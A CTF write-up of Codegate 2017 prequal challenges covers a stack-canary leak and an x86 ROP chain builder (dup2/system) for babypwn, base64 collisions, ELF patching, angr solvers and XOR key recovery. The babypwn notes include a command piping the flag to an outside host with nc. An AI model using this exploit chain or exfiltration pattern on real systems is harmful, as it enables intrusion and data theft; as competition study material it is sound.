
@parksjin01
Last active June 26, 2017 07:10
Codegate-prequals 2017 writeup

babypwn

  • The program is small and simple: a plain stack overflow, and we can get the canary through a memory leak.
  • It's a server program, so it reads user input with recv(), and the input routine appends 0x0a at the end of the user input.
  • So if we send exactly 40 bytes we get the canary back. The canary's last byte is overwritten with 0x0a, but that doesn't matter:
  • in most cases the canary's last byte is just \x00, so we can simply assume the last byte is \x00.
  • The next protection is NX, which we bypass with ROP and return-to-libc.
  • I made a [simple python script] which runs ls -al. But there is a critical error in the script.
  • I have to send the result to the client side, and I need to do it by redirecting IO. But I couldn't find how to call a libc function many times in a ROP chain in an x86 program.
  • I solved this problem; I still have a question about the ROP chain, but I solved it with a Linux command.
  • I used cat ./flag|nc 192.168.0.3 instead of ls -al and that solved it. But I can't understand why other people's writeups don't work very well.
  • This is the answer script
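
The canary recovery and the "call several libc functions in one x86 chain" question from the notes above, worked as an added Python example. This is not the writeup's script: every address (libc functions, pop/ret gadgets, the command string), the client socket fd and the padding between the canary and the saved return address are placeholders for a hypothetical binary. The standard answer to the chaining question on 32-bit cdecl is a `pop <n>; ret` gadget in each call's return slot, which discards that call's arguments so the `ret` lands on the next function address.

```python
import struct

# Added example for the babypwn notes; it is not the writeup's script.
# Every address (libc functions, pop/ret gadgets, the command string),
# the client socket fd and the padding between canary and saved return
# address are placeholders for a hypothetical x86 binary.


def p32(value):
    """Pack a 32-bit little-endian dword (x86)."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def recover_canary(echoed, buf_len=40):
    """Rebuild the 4-byte canary from what the server echoed back.

    We sent exactly buf_len bytes and the input routine appended 0x0a, which
    landed on the canary's low byte. The echo therefore shows 0x0a followed
    by the canary's three high bytes. glibc keeps that low byte 0x00 so that
    string functions stop at the canary; restore it.
    """
    leaked = echoed[buf_len:buf_len + 4]
    if len(leaked) != 4 or leaked[0] != 0x0A:
        raise ValueError("unexpected leak layout")
    return b"\x00" + leaked[1:]


def build_chain(calls, pop_gadgets):
    """Chain several cdecl libc calls in one x86 ROP payload.

    Layout per call: [func][return slot][args...]. When func returns it pops
    the return slot; for every call but the last that slot holds a
    'pop <n regs> ; ret' gadget, which consumes the n arguments so the ret
    lands on the next func address. calls = [(func_addr, [args]), ...],
    pop_gadgets = {n_args: gadget_addr}.
    """
    chain = b""
    last = len(calls) - 1
    for i, (func, args) in enumerate(calls):
        chain += p32(func)
        if args:
            ret_slot = 0xDEADBEEF if i == last else pop_gadgets[len(args)]
            chain += p32(ret_slot) + b"".join(p32(a) for a in args)
        elif i == last:
            chain += p32(0xDEADBEEF)   # where the final call would return
        # a call without args needs no gadget: the next func address is its return slot
    return chain


def build_payload(canary, chain, buf_len=40, pad_after_canary=12):
    """buffer | canary | padding up to the saved return address | chain.

    pad_after_canary covers locals and saved ebp between the canary and the
    return address; it is binary specific and assumed here.
    """
    return b"A" * buf_len + canary + b"B" * pad_after_canary + chain


# Placeholder addresses, not from the challenge binary.
DUP2 = 0xF7E40000
SYSTEM = 0xF7E41000
POP1_RET = 0x080484F1          # pop ebp ; ret
POP2_RET = 0x080484F0          # pop ebx ; pop ebp ; ret
SOCK_FD = 4                    # accepted client socket
CMD_ADDR = 0x0804A000          # address of a "cat ./flag" string we control


def example_chain():
    """dup2(sock, 0); dup2(sock, 1); system(cmd): output goes back over the socket."""
    calls = [(DUP2, [SOCK_FD, 0]), (DUP2, [SOCK_FD, 1]), (SYSTEM, [CMD_ADDR])]
    return build_chain(calls, {1: POP1_RET, 2: POP2_RET})


if __name__ == "__main__":
    # Constructed echo: 40 filler bytes, then the 0x0a-clobbered canary.
    canary = recover_canary(b"A" * 40 + b"\x0a\x11\x22\x33")
    payload = build_payload(canary, example_chain())
    print(canary.hex(), len(payload))
```

The dup2/dup2/system sequence is the usual way to get command output back over the socket without piping to nc; the `pad_after_canary` value and the gadget addresses have to be read from the real binary and libc.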

babymisc

  • It's a really simple problem; we don't have to overflow anything or do any other tricks.
  • The problem is about base64 decoding collisions: non-canonical encodings that decode to the same bytes.
  • If the encoded string ends with '==' there are 16 colliding strings;
  • if it ends with a single '=' there are 4 colliding strings.
  • For example, YQ== and YR== both decode to a.
  • The first question can be passed with a base64 collision. The second question can be solved through an error in a user function: we can solve it just by adding '='.
  • Finally we can input a Linux command, base64 encoded. But we can't use cat ./flag, so I used more fl* instead.
  • I also made an automatic python script that solves the questions automatically and sends the command.
  • But you can't use the more fl* command from the script, so you need to use another command or solve that part by hand.
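
The collision counts above follow from where the unused bits sit in the last data character. This added Python example (not the author's solver) enumerates every variant a lenient decoder accepts and checks them against Python's own `base64.b64decode`, which, like many decoders, ignores the unused trailing bits.

```python
import base64
import string

# Added example for the babymisc notes; not the author's solver.
ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def base64_collisions(encoded):
    """Every base64 string a lenient decoder maps to the same bytes as `encoded`.

    Only the last data character can vary. With '==' padding it carries
    2 data bits and 4 unused bits (2**4 = 16 variants); with '=' it carries
    4 data bits and 2 unused bits (2**2 = 4 variants); with no padding all
    6 bits are used, so the encoding is unique.
    """
    pad = len(encoded) - len(encoded.rstrip("="))
    if pad == 0:
        return [encoded]
    unused = 4 if pad == 2 else 2
    last = len(encoded) - pad - 1
    high = ALPHABET.index(encoded[last]) >> unused   # the bits that carry data
    return [
        encoded[:last] + ALPHABET[(high << unused) | low] + encoded[last + 1:]
        for low in range(1 << unused)
    ]


def collide(data):
    """Collisions for the canonical encoding of raw bytes."""
    return base64_collisions(base64.b64encode(data).decode())


def all_decode_to(variants, expected):
    """True if a standard (lenient) decoder maps every variant to `expected`."""
    return all(base64.b64decode(v) == expected for v in variants)


if __name__ == "__main__":
    for raw in (b"a", b"ab", b"abc"):
        v = collide(raw)
        print(raw, len(v), v[:4], all_decode_to(v, raw))
```

A decoder that rejects non-zero unused bits (strict RFC 4648 canonical checking) would accept only the canonical form; the challenge's check evidently did not, which is what the first question relies on.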

Meow

  • I got stuck guessing the original key of the md5. I looked at others' writeups to see how they guessed that part.

angrybird

  • When you try to execute the binary it doesn't run; it just exits. We can find the reason by debugging it with IDA or another debugger...
  • There is some junk code that makes execution impossible. We have to patch that code to solve it.
0000000000400776         xor        eax, eax
0000000000400778         cmp        eax, 0x0
000000000040077b         je         j_exit
  • That part makes execution impossible: xor eax, eax sets eax to 0, so cmp eax, 0 always matches and the je to exit is always taken. So we change it to nop instructions.
  • Next the binary calls the user function at 0x4006f6.
00000000004006f6         push       rbp                                         ; CODE XREF=sub_400761+69
00000000004006f7         mov        rbp, rsp
00000000004006fa         mov        edi, 0x405064                               ; "you should return 21 not 1 :(", argument "s" for method j_puts
00000000004006ff         call       j_puts
0000000000400704         mov        eax, dword [0x606060]
000000000040070a         pop        rbp
000000000040070b         ret
  • It returns the value stored at 0x606060, and the message says that value should be 21, not 1. So we have to patch it.
  • Then the binary calls 0x40070c, but we don't need that call, so change it to nop instructions.
  • Finally the binary calls the user function at 0x40072a before fgets. That function compares $rbp-0x58 with 0x40508e. Later $rbp-0x58 is used in the if statements, so I thought to change that value to the same as 0x405082 and patched that.
  • Now we input 21 characters, and if we pass the if statements (about 400 conditions) we get the flag.
  • However, it's too hard for a human to guess the correct password, so we use the angr Python framework. It was first released at DEF CON 2015 and many vulnerabilities have been found with it. Many people are interested in it and there are many guides on Google, so I won't explain it here.
  • Here is the python script
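
Patching by hand in a hex editor works, but for a file you will re-run under angr it is handier to script the patches. This added Python example (not the writeup's tooling) maps a virtual address to its file offset through the ELF program headers and applies patches derived from the listings above: the `mov eax, [0x606060]` at 0x400704 is 6 bytes (0x400704 to 0x40070a), so it becomes `mov eax, 21 ; nop`; and instead of nopping `xor/cmp/je` (the listing does not show how many bytes the je occupies) the `xor eax, eax` becomes `mov al, 1`, so the compare fails and the je to exit falls through. The call to 0x40070c and the compare inside 0x40072a are left out because their call sites and encodings are not on the page. The ELF used in the demo is a constructed stand-in, not the challenge file.

```python
import struct

# Added example for the angrybird patching notes above; not the writeup's tooling.
# Patch bytes are derived from the instruction encodings visible in the listing
# (mov eax,[rip+disp32] is 6 bytes: 0x400704 -> 0x40070a). The call to 0x40070c
# and the compare in 0x40072a are left out: their sites are not shown on the page.

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")   # ELF64 file header, 64 bytes
PHDR = struct.Struct("<IIQQQQQQ")            # ELF64 program header, 56 bytes
PT_LOAD = 1


def iter_phdrs(data):
    """Yield the program headers of an ELF64 image."""
    hdr = EHDR.unpack_from(data, 0)
    ident = hdr[0]
    if ident[:4] != b"\x7fELF" or ident[4] != 2:
        raise ValueError("not an ELF64 file")
    e_phoff, e_phentsize, e_phnum = hdr[5], hdr[9], hdr[10]
    for i in range(e_phnum):
        yield PHDR.unpack_from(data, e_phoff + i * e_phentsize)


def vaddr_to_offset(data, vaddr):
    """Map a virtual address to its file offset through the PT_LOAD segments."""
    for p_type, _flags, p_off, p_vaddr, _paddr, p_filesz, _memsz, _align in iter_phdrs(data):
        if p_type == PT_LOAD and p_vaddr <= vaddr < p_vaddr + p_filesz:
            return vaddr - p_vaddr + p_off
    raise ValueError(f"{vaddr:#x} is not backed by the file")


def patch_elf(data, patches):
    """Return a copy of `data` with each {vaddr: bytes} patch applied."""
    out = bytearray(data)
    for vaddr, new in patches.items():
        off = vaddr_to_offset(data, vaddr)
        out[off:off + len(new)] = new
    return bytes(out)


ANGRYBIRD_PATCHES = {
    # 0x400776: xor eax,eax (31 c0) -> mov al,1 (b0 01). eax is now non-zero,
    # so 'cmp eax,0' fails and 'je j_exit' falls through, whatever its length.
    0x400776: b"\xb0\x01",
    # 0x400704: mov eax,[rip+disp32] (6 bytes, reads 0x606060) -> mov eax,21 ; nop
    0x400704: b"\xb8\x15\x00\x00\x00\x90",
}


def make_demo_elf():
    """Constructed stand-in for the challenge binary (not the real file):
    one PT_LOAD segment at 0x400000 with the two original instruction
    encodings placed at the offsets the listing implies."""
    size = 0x800
    img = bytearray(b"\xcc" * size)
    ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)     # ELF64, little-endian, v1
    img[0:64] = EHDR.pack(ident, 2, 0x3E, 1, 0x400776, 64, 0, 0, 64, 56, 1, 0, 0, 0)
    img[64:120] = PHDR.pack(PT_LOAD, 5, 0, 0x400000, 0x400000, size, size, 0x1000)
    img[0x704:0x70A] = b"\x8b\x05\x56\x59\x20\x00"   # mov eax,[rip+0x205956] = [0x606060]
    img[0x776:0x77B] = b"\x31\xc0\x83\xf8\x00"       # xor eax,eax ; cmp eax,0
    return bytes(img)


if __name__ == "__main__":
    before = make_demo_elf()
    after = patch_elf(before, ANGRYBIRD_PATCHES)
    for va in ANGRYBIRD_PATCHES:
        off = vaddr_to_offset(after, va)
        print(f"{va:#x} @ file+{off:#x}: {before[off:off+6].hex()} -> {after[off:off+6].hex()}")
```

For the real binary, pass the file's bytes to `patch_elf` and write the result to a new file; disassemble the patched addresses afterwards to confirm the replacement bytes decode to the intended instructions before handing the file to angr.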

Easycrack 101

  • When I solved this problem I could feel that angr is a really interesting framework and that many people are interested in it.
  • In this contest there was another problem related to angr, and this problem is also related to it.
  • The program's logic is very simple: it takes user input from argv and passes it through a series of if conditions. If the input passes all of them the program prints Good job; if it fails any of them it prints NoNo. All 101 files have the same logic; the only hard part is the number of files.
  • I thought I could automate it with angr and python, but I'm not familiar with angr, so I just found all the addresses by hand...
  • The python script is here
  • I couldn't search for the avoid addresses because there are too many files, and I think that causes a memory problem. Actually, that script can't run all 101 files at once and has to be run several times, like 1 to 20 and 20 to 30.
  • After finding all 101 keys there was no string that looked like a flag. So I searched for writeups and found that there was a website; we have to authenticate to that website to get the flag, and the 101 keys are used in the authentication.
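
The two angr-based problems above (angrybird: 21 characters via fgets; Easycrack 101: the key in argv, "Good job" versus "NoNo") can share one solver. This is an added Python example, not the writeup's script; it uses angr's public API (`angr.Project`, `factory.entry_state`, `simulation_manager`, `explore`, `posix.dumps`) and needs angr installed to run the `solve_*` functions. For Easycrack it keys find/avoid on the program's output instead of on addresses, which removes the need to collect avoid addresses for 101 files, and it loads one binary at a time. The find/avoid addresses passed to `solve_stdin` are the caller's; none are given here.

```python
import gc

# Added example serving the angrybird and Easycrack 101 notes above; it is not
# the writeup's script. angr must be installed for the solve_* functions.

GOOD, BAD = b"Good job", b"NoNo"


def classify(stdout):
    """Predicate for find/avoid in Easycrack 101: 'good' once 'Good job' has
    been printed, 'bad' once 'NoNo' has been printed, None while undecided.
    Keying on the output avoids collecting avoid addresses for 101 files."""
    if GOOD in stdout:
        return "good"
    if BAD in stdout:
        return "bad"
    return None


def solve_argv(path, arg_len=32):
    """Easycrack 101: the key arrives in argv[1]. Returns the key bytes (up to
    the first NUL) or None if no path prints 'Good job'. arg_len is an assumed
    upper bound on the key length."""
    import angr
    import claripy
    proj = angr.Project(path, auto_load_libs=False)
    arg = claripy.BVS("arg", 8 * arg_len)
    state = proj.factory.entry_state(args=[path, arg])
    simgr = proj.factory.simulation_manager(state)
    simgr.explore(find=lambda s: classify(s.posix.dumps(1)) == "good",
                  avoid=lambda s: classify(s.posix.dumps(1)) == "bad")
    if not simgr.found:
        return None
    key = simgr.found[0].solver.eval(arg, cast_to=bytes)
    return key.split(b"\x00", 1)[0]


def solve_many(paths):
    """One Project per file, dropped before the next one is loaded, so the
    states of 101 binaries are not all kept alive at once."""
    keys = {}
    for path in paths:
        keys[path] = solve_argv(path)
        gc.collect()
    return keys


def solve_stdin(path, find_addr, avoid_addrs):
    """angrybird style: the password is read with fgets from stdin.
    find_addr/avoid_addrs are the success block and the failure blocks of the
    (patched) binary, supplied by the caller; the recovered stdin is returned."""
    import angr
    proj = angr.Project(path, auto_load_libs=False)
    simgr = proj.factory.simulation_manager(proj.factory.entry_state())
    simgr.explore(find=find_addr, avoid=avoid_addrs)
    return simgr.found[0].posix.dumps(0) if simgr.found else None


if __name__ == "__main__":
    import sys
    print(solve_many(sys.argv[1:]))   # python solve.py easycrack_001 easycrack_002 ...
```

Releasing each project before loading the next is the in-process version of running the files in batches as the writeup did; if memory still grows, a fresh process per batch remains the safe fallback.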

RamG-Thunder

  • When we run the program we see menu options 0-3, but if we input 4 we enter a hidden menu. In the hidden menu we can try to find the flags.
  • In the disassembly we can see
cmp eax, 4
ja RamG.0105150d

We get the hidden menu when we enter 4 because of the ja (jump if above, unsigned): 4 is not above 4, so the jump is not taken.

  • Now we can see the hidden menu, and the 2nd option is the find-the-flag game. Let's try it.
  • There are 5 stages in this game, and there is an interesting point here: the stage logic is symmetric. Stages 1 and 5 use the same procedure to clear them, and stages 2 and 4 use the same thing.
  • In the 1st stage, we have to find the string which, XORed with 47459, gives MUYLX. It is yamya, so we input yamya.
  • In the 1st and 5th stages there is anti-debugging code. So we have to change the jne instruction to nop.
  • In the 2nd stage, the program doesn't take user input. Instead it compares the user's MAC address with its own.
  • ebx+194 to ebx+196 holds the user's MAC address, and it should be 0xc8, 0x59, 0x78. So let's change those three bytes to those values.
  • In the 3rd stage, if there is a Hellow registry key under HKCU and the hellow_FishWorld value can be read, we pass this stage.
  • In the 4th stage we can pass with the same method as the 2nd. The only change is that now the user's MAC address is at edi+194 to edi+196 and it has to be 0x00, 0x0c and 0x29. So change those three bytes to 0x00, 0x0c and 0x29.
  • Finally, in the 5th stage, we have to input a 5-character string which, XORed with 36742, gives [S[X], and that is hello. So let's input hello.
  • After passing all 5 stages we notice that a file named c is created. If we open it in a hex editor we can tell it's a PNG file, so change its extension to png and open it.
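
The stage 1 and 5 checks and the final file check, as an added Python example (not the challenge's code). The numeric "key" is applied as its decimal digits in ASCII: that is exactly what turns hello into [S[X] with 36742, and because XOR is its own inverse the same function recovers the input from the target. Note that with the stage-1 values as printed above, yamya XOR 47459 gives MVYLX rather than MUYLX (44459 would give MUYLX), so one character in the stage-1 line is probably a transcription slip. The last function identifies the dropped file by its signature instead of guessing from the extension.

```python
# Added example for the RamG-Thunder stage 1/5 checks and the final file
# check; not the challenge's code. The stage key is applied as ASCII digits.

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def xor_with_digits(text, key):
    """XOR each character of text with the matching ASCII digit of key."""
    digits = str(key)
    return "".join(chr(ord(c) ^ ord(digits[i % len(digits)])) for i, c in enumerate(text))


def solve_stage(target, key):
    """XOR is its own inverse, so the input that produces `target` is the
    target XORed with the same key (stage 5: [S[X] -> hello)."""
    return xor_with_digits(target, key)


def looks_like_png(data):
    """Identify the dropped file 'c' by its 8-byte PNG signature."""
    return data[:8] == PNG_MAGIC


if __name__ == "__main__":
    print(xor_with_digits("hello", 36742))   # [S[X]
    print(solve_stage("[S[X]", 36742))       # hello
    print(xor_with_digits("yamya", 47459))   # compare with the stage-1 target above
    with open("c", "rb") as f:
        print("PNG" if looks_like_png(f.read(8)) else "not PNG")
```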